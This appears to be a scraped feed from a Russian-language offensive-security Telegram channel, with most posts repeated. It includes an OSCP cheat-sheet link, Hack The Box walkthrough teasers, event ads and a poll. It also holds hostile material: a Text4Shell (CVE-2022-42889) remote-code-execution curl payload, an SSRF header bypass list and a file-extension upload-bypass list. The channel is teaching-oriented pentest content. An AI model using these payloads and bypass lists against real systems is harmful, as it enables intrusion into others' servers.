#ЦиклСтатей_Linux
Файловая система Linux. В данной статье вы узнаете о разновидностях файловых систем Linux и об устройстве самой файловой системы. Особенно будет полезно тем, кто только начинает изучать линук. А для тех кто пропустил данную тему, советую к прочтению 😉
Файловая система Linux. В данной статье вы узнаете о разновидностях файловых систем Linux и об устройстве самой файловой системы. Особенно будет полезно тем, кто только начинает изучать линук. А для тех кто пропустил данную тему, советую к прочтению 😉
Telegraph
Файловая система Linu
Расскажу про файловую систему Linux
❤15👍2❤🔥1😍1
#CheatSheet
OSCP Cheat Sheet
Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
OSCP Cheat Sheet
Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
👍7❤3❤🔥1🔥1🤔1😍1
#КейсИБ
От вашего коллеги пришло письмо с ссылкой на Google Drive. По предпросмотру видно, что там папка с видео и каким то вордовским файлом.
Ваши действия?
Не решено. Вас взломали
От вашего коллеги пришло письмо с ссылкой на Google Drive. По предпросмотру видно, что там папка с видео и каким то вордовским файлом.
Ваши действия?
Не решено. Вас взломали
👍8🤣4❤🔥1❤1🔥1
Forwarded from Похек
#CVE #POC
Text4Shell CVE-2022-42889
CVE-2022-42889 Text4Shell affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.
POC:
curl http://localhost/text4shell/attack?search=%24%7Bnoscript%3Ajavanoscript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D
Text4Shell CVE-2022-42889
CVE-2022-42889 Text4Shell affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.
POC:
curl http://localhost/text4shell/attack?search=%24%7Bnoscript%3Ajavanoscript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D
👍3🤔2❤🔥1❤1🔥1
#ЦиклСтатей_HTB
[CVE-2021-43798 + RCE Consul | HTB Medium | Ambassador]
Доброго времени суток, сегодня мы разберем машину Ambassador на Hack The Box со сложностью Medium.
[CVE-2021-43798 + RCE Consul | HTB Medium | Ambassador]
Доброго времени суток, сегодня мы разберем машину Ambassador на Hack The Box со сложностью Medium.
Telegraph
[CVE-2021-43798 + RCE Consul | HTB Medium | Ambassador]
Резолвим хост в /etc/hosts: 10.10.11.183 amba.htb Перечислим сервисы: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 3000/tcp open ppp?…
❤7❤🔥1👍1
#ЦиклСтатей_Linux
Сегодня я вам хотел рассказать как действовать на этапе пост эксплуатации, если вы попали в урезанный shell и вам мешает его ограничения. Данную статью можно считать cheat sheet по создание TTY Shell.
Сегодня я вам хотел рассказать как действовать на этапе пост эксплуатации, если вы попали в урезанный shell и вам мешает его ограничения. Данную статью можно считать cheat sheet по создание TTY Shell.
Telegraph
Spawning a TTY Shell
Неинтерактивная оболочка tty-shell Если у вас не tty-shell, то некоторые команды и вещи вы не сможете выполнить. Это может произойти, если вы загружаете обратные оболочки на веб-сервер, так что оболочка, которую вы получаете, создается пользователем www-data…
👍5❤🔥2❤2🔥1😍1
Всем привет 🙃
Как вы знаете у нас проводятся курсы для Script-Kiddie для Новичков и тд
Сейчас мы это приостановили, но собираемся восстановить 🥳
Тут объявлений не будет но будет тут - NR | Script-Kiddie (Это чатик для учащихся)
И так же ссылка на Discord (Занятия тут)
Занятия начнутся когда наберется минимум 50 человек😁
Так же мы скоро выкатим пост о том куда стремится наше сообщество, планы на будущее 🫢
Вас ждет много сюрпризов, ждите)
P.S. : Накидайте реакций под пост, коментов там, хочется видеть обратную связь )
Как вы знаете у нас проводятся курсы для Script-Kiddie для Новичков и тд
Сейчас мы это приостановили, но собираемся восстановить 🥳
Тут объявлений не будет но будет тут - NR | Script-Kiddie (Это чатик для учащихся)
И так же ссылка на Discord (Занятия тут)
Занятия начнутся когда наберется минимум 50 человек
Так же мы скоро выкатим пост о том куда стремится наше сообщество, планы на будущее 🫢
Вас ждет много сюрпризов, ждите)
P.S. : Накидайте реакций под пост, коментов там, хочется видеть обратную связь )
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥29👍5❤🔥4❤3😍2🤔1
Всем подписчикам доброго времени суток!
После большого количества этапов разработки и проектирования мы рады представить вам наш сайт!🍾
https://cybernetrunner.ru
На сайте будут появляться наши партнеры, глобальные объявления, новые фишки и т.д.
После большого количества этапов разработки и проектирования мы рады представить вам наш сайт!🍾
https://cybernetrunner.ru
На сайте будут появляться наши партнеры, глобальные объявления, новые фишки и т.д.
❤18🔥5👍4😍2
This media is not supported in your browser
VIEW IN TELEGRAM
#ПО
DrawNmap
Инструмент, разработанный на Python, для отображения на сетевой диаграмме содержимого сканирования Nmap в формате XML. Узлы представляют каждый из сканируемых активов в сети с соответствующими открытыми портами. Фильтрация портов позволяет отображать на графике только те устройства, у которых этот порт включен.
DrawNmap
Инструмент, разработанный на Python, для отображения на сетевой диаграмме содержимого сканирования Nmap в формате XML. Узлы представляют каждый из сканируемых активов в сети с соответствующими открытыми портами. Фильтрация портов позволяет отображать на графике только те устройства, у которых этот порт включен.
👍11❤🔥2❤1😍1
2020-11-17-124306.gif
21.8 MB
#Docker
Pentest Docker Step-By-Step
Образ Docker для эксплуатации RCE, опробования методов пентеста и тестирования решений для обеспечения безопасности контейнеров (trivy, falco и т.д.). Образ содержит уязвимый (CVE-2014-6271) пакет Bash, который позволяет удаленное выполнение кода. Уязвимость более известна как Shellshock. За основу взят образ от opsxcq.
Pentest Docker Step-By-Step
Образ Docker для эксплуатации RCE, опробования методов пентеста и тестирования решений для обеспечения безопасности контейнеров (trivy, falco и т.д.). Образ содержит уязвимый (CVE-2014-6271) пакет Bash, который позволяет удаленное выполнение кода. Уязвимость более известна как Shellshock. За основу взят образ от opsxcq.
👍4🔥3❤🔥1❤1😍1
This media is not supported in your browser
VIEW IN TELEGRAM
🔐Как проводить анализ безопасности исходного кода? И какие сканеры для этого использовать?
AM Live: Новейшие методики анализа безопасности исходного кода
9 ноября в 11:00 (по МСК)
Ключевые вопросы:
🔹Каковы основные методики и подходы к повышению безопасности исходного кода?
🔹 Как провести проверку безопасности архитектуры и логики разработанного ПО?
🔹 Как выбрать идеальный анализатор исходного кода? В чем отличия между SAST, DAST, IAST, FAST и BAST?
🔹 В чем особенности проверки безопасности и контроля компонентов open source? И что такое OSA?
🔹 На чем основана логика работы сканеров кода и насколько ей можно доверять?
🔹 Сканер показал кучу уязвимостей и ошибок. Как убедиться, что это не ложные срабатывания и оценить их критичность?
🔹 Как на требования к безопасности кода повлияли события 2022 года?
🔹 Что ожидает рынок в перспективе 2-3 года? Появится ли у него четкая российская специфика?
🔗 Полная программа, спикеры и регистрация на конференцию
AM Live: Новейшие методики анализа безопасности исходного кода
9 ноября в 11:00 (по МСК)
Ключевые вопросы:
🔹Каковы основные методики и подходы к повышению безопасности исходного кода?
🔹 Как провести проверку безопасности архитектуры и логики разработанного ПО?
🔹 Как выбрать идеальный анализатор исходного кода? В чем отличия между SAST, DAST, IAST, FAST и BAST?
🔹 В чем особенности проверки безопасности и контроля компонентов open source? И что такое OSA?
🔹 На чем основана логика работы сканеров кода и насколько ей можно доверять?
🔹 Сканер показал кучу уязвимостей и ошибок. Как убедиться, что это не ложные срабатывания и оценить их критичность?
🔹 Как на требования к безопасности кода повлияли события 2022 года?
🔹 Что ожидает рынок в перспективе 2-3 года? Появится ли у него четкая российская специфика?
🔗 Полная программа, спикеры и регистрация на конференцию
😍5👍2❤1❤🔥1🔥1
#ЦиклСтатей_HTB
[ Повышение привилегий через LD_PRELOAD | HTB Easy | Photobomb ]
Доброго времени суток, сегодня мы разберем машину Photobomb на Hack The Box со сложностью Easy.
[ Повышение привилегий через LD_PRELOAD | HTB Easy | Photobomb ]
Доброго времени суток, сегодня мы разберем машину Photobomb на Hack The Box со сложностью Easy.
Telegraph
[ Повышение привилегий через LD_PRELOAD | HTB Easy | Photobomb ]
Перечислим сервисы: > nmap --min-rate 1000 -v -sC -sV -T5 photobomb.htb PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d…
🔥6👍3❤🔥1❤1😍1
#CheatSheet
SSRF Bypass List
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
SSRF Bypass List
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
🤔17🔥2❤🔥1❤1😍1
This media is not supported in your browser
VIEW IN TELEGRAM
Как защищать промышленные предприятия от киберугроз?
AM Live: Кибербезопасность промышленных предприятий
⏰17 ноября в 11:00 МСК
В прямом эфире эксперты расскажут:
♦️Как на практике защищать промышленные предприятия от киберугроз.
♦️О ключевых тенденциях в построении эффективных систем кибербезопасности промышленных предприятий.
♦️Какие угрозы и риски вышли на первый план в 2022 году, и как это отразилось на требованиях к системам защиты.
♦️Как быть с теми, кто ранее инвестировал в иностранные АСУ ТП и иностранные СЗИ?
♦️Возможно ли выполнить в установленные сроки Указ Президента №166.
♦️Как переход на отечественное ПО отразится на реальной защищенности промышленных предприятий.
Участие бесплатное. Необходима регистрация.
Полная программа, спикеры и регистрация на конференцию
AM Live: Кибербезопасность промышленных предприятий
⏰17 ноября в 11:00 МСК
В прямом эфире эксперты расскажут:
♦️Как на практике защищать промышленные предприятия от киберугроз.
♦️О ключевых тенденциях в построении эффективных систем кибербезопасности промышленных предприятий.
♦️Какие угрозы и риски вышли на первый план в 2022 году, и как это отразилось на требованиях к системам защиты.
♦️Как быть с теми, кто ранее инвестировал в иностранные АСУ ТП и иностранные СЗИ?
♦️Возможно ли выполнить в установленные сроки Указ Президента №166.
♦️Как переход на отечественное ПО отразится на реальной защищенности промышленных предприятий.
Участие бесплатное. Необходима регистрация.
Полная программа, спикеры и регистрация на конференцию
🤣6🤔2❤🔥1❤1👍1
#CheatSheet
File Extension Bypass
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
Working in PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
File Extension Bypass
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
Working in PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
❤5🔥2❤🔥1👍1😍1
Где прячется SSRF-уязвимость?
Кейсы и решения
Суть уязвимости заключается в небезопасном применении пользовательских данных в выборе сервера или системы, к которым нужно обратиться за какой-либо информацией или ресурсами. Это может быть загрузка картинки с указанием ее ссылки в сети Интернет или некорректная организация работы с API-сервером. Для примера возьмем вариант с загрузкой аватарки на сервер по ссылке в GET-параметре.
Кейсы и решения
Суть уязвимости заключается в небезопасном применении пользовательских данных в выборе сервера или системы, к которым нужно обратиться за какой-либо информацией или ресурсами. Это может быть загрузка картинки с указанием ее ссылки в сети Интернет или некорректная организация работы с API-сервером. Для примера возьмем вариант с загрузкой аватарки на сервер по ссылке в GET-параметре.
👍8❤1❤🔥1🔥1😍1
Какой язык программирования Вы хотели бы изучать?
Anonymous Poll
14%
JS
3%
Node js
5%
PHP
15%
Java
35%
Python
3%
Bash
6%
Rust
11%
Golang
8%
Ничего из этого/отвечу в комментариях
👍5❤🔥2🔥2😍1